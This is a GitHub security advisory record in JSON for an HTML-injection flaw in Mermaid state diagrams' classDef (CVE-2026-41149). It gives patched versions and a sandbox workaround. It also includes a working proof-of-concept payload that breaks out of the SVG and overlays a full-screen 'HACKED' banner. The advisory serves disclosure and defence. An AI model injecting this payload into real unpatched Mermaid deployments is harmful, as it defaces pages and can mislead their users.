{"id":"GHSA-ghcm-xqfw-q4vr","summary":"Mermaid: Improper sanitization of `classDef` in state diagrams leads to HTML injection","details":"### Impact\n\nUnder the default configuration, Mermaid state diagram's `classDef` allow DOM injection that escapes the SVG, although `\u003cscript\u003e` tags are removed, preventing XSS.\n\n#### Proof-of-concept\n\n```\nstateDiagram-v2\n  classDef xss fill:red\u003c/style\u003e\u003c/svg\u003e\u003cstyle\u003e*{x:x;y:y;overflow:visible!important;contain:none!important;transform:none!important;filter:none!important;clip-path:none!important}\u003c/style\u003e\u003cdiv style=\"x:x;y:y;color:red;font:5em/1 monospace;display:grid;place-items:center;z-index:2147483647;width:100vw;height:100vh;position:fixed;top:0;left:0;background:black\"\u003eHACKED\u003c/div\u003e\u003csvg\u003e\u003cstyle\u003ea:b\n  [*] --\u003e A:::xss\n```\n\n### Patches\n\n- [v11.15.0](https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) (see [37ff937f1da2e19f882fd1db01235db4d01f4056](https://github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056))\n- [v10.9.6](https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6) (see [4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3](https://github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3))\n\n### Workarounds\n\nIf you can not update to a patched version, setting [`\"securityLevel\": \"sandbox\"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel)  will prevent this, by rendering the mermaid diagram in a sandboxed `\u003ciframe\u003e`.\n\n### Credits\n\nThanks to @zsxsoft from @KeenSecurityLab for reporting this vulnerability.","aliases":["CVE-2026-41149"],"modified":"2026-05-11T19:49:03.497911Z","published":"2026-05-11T19:36:46Z","database_specific":{"cwe_ids":["CWE-94"],"github_reviewed_at":"2026-05-11T19:36:46Z","nvd_published_at":null,"severity":"MODERATE","github_reviewed":true},"references":[{"type":"WEB","url":"https://github.com/mermaid-js/mermaid/security/advisories/GHSA-ghcm-xqfw-q4vr"},{"type":"WEB","url":"https://github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056"},{"type":"WEB","url":"https://github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3"},{"type":"PACKAGE","url":"https://github.com/mermaid-js/mermaid"},{"type":"WEB","url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0"},{"type":"WEB","url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6"},{"type":"WEB","url":"https://mermaid.js.org/config/schema-docs/config.html#securitylevel"}],"affected":[{"package":{"name":"mermaid","ecosystem":"npm","purl":"pkg:npm/mermaid"},"ranges":[{"type":"SEMVER","events":[{"introduced":"11.0.0-alpha.1"},{"fixed":"11.15.0"}]}],"database_specific":{"last_known_affected_version_range":"\u003c= 11.14.0","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-ghcm-xqfw-q4vr/GHSA-ghcm-xqfw-q4vr.json"}},{"package":{"name":"mermaid","ecosystem":"npm","purl":"pkg:npm/mermaid"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"10.9.6"}]}],"database_specific":{"last_known_affected_version_range":"\u003c= 10.9.5","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-ghcm-xqfw-q4vr/GHSA-ghcm-xqfw-q4vr.json"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"}]}